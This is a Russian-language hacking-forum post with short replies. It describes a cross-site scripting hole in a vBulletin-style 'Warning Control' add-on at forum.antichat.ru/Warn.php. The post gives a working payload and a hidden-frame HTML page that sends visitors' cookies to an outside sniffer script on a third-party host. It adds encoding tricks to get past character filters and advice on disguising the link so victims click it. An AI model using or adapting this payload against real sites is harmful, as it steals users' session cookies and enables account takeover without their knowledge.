http://forum.antichat.ru/Warn.php пропускает вхождения Пример: http://forum.antichat.ru/Warn.php?do=ViewWarnings&id=0"><script>alert(document.cookie);</script> Чего делать? Создавать фрейм-содержащую страницу, где левый невидимый фрейм будет иметь путь до снифера* (* - см.ниже), а центральный - типа липовый сайт. И давать ссылку на свой сайт. Вот так выглядит index.html (в примере адрес снифера указан мой): HTML: <html> <head> <title>Типа липовый сайт...</title> </head> <frameset cols="0,*" frameborder="NO" border="0" framespacing="0"> <frame name="leftFrame" scrolling="NO" noresize src="http://forum.antichat.ru/Warn.php?do=ViewWarnings&id=0%22%3E%3Cscript%3Edocument.body.background=%22http://altsupport.h15.ru/cgi-bin/script.php?cook=%22%2Bdocument.cookie;%3C/script%3E"> <frame name="mainFrame" src="main_frame.html"> </frameset> <noframes><body>Ты зачем фреймы отрубил, засранец??? :)</body></noframes> </html> ... * Так как + (плюсик) вырезается, его заменяем: %2B Чтобы все это впихнуть в путь левого фрейма, " (кавычка) и скобки тоже заменяем: " - %22 > - %3C > - %3E ... Если лень возится с сайтом, то можно и тут просто ссылкой дать. Не каждый же смотрит на статусную строку? А если еще УРЛ и перекодировать, то даже если и смотрят - все-равно нажмут (то что ниже - не перекодировал). Как пример: ... !ВНИМАНИЕ! ПРИ НАЖАТИИ НА СЛЕДУЮЩУЮ ССЫЛКУ ВАШИ КУКИ УЙДУТ КО МНЕ НА СНИФЕР! ... Всем добро пожаловать на сайт http://forum.antichat.ru ... © censored!
Молодец ... Даю грина ) Да, но прокатит она только там, где устанвлен хак "Warning Control [Created By Zero Tolerance]" ...
Добавление (всегда пригодится): url-конвертер брать тут: [*censored*] Встречается он не часто, но все-равно встречается.